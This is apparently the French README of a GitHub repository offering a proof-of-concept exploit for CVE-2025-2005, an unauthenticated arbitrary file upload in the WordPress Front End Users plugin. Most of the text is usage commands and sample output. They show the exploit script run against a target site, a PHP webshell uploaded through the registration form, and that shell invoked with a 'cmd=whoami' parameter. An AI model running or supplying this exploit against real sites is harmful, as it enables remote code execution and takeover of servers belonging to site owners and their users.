
Exploit de téléversement arbitraire de fichier pour WordPress FEUP (CVE-2025-2005)
Ce dépôt fournit un exploit Proof of Concept (PoC) pour le plugin WordPress Front End Users (versions jusqu'à 3.2.32), qui est vulnérable au téléchargement arbitraire de fichiers en raison de l'absence de validation MIME/type de fichier dans son formulaire d'inscription. Cela permet à des attaquants non authentifiés de télécharger des fichiers malveillants (par exemple, des webshells), pouvant conduire à une exécution de code à distance (RCE) sur le serveur.
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami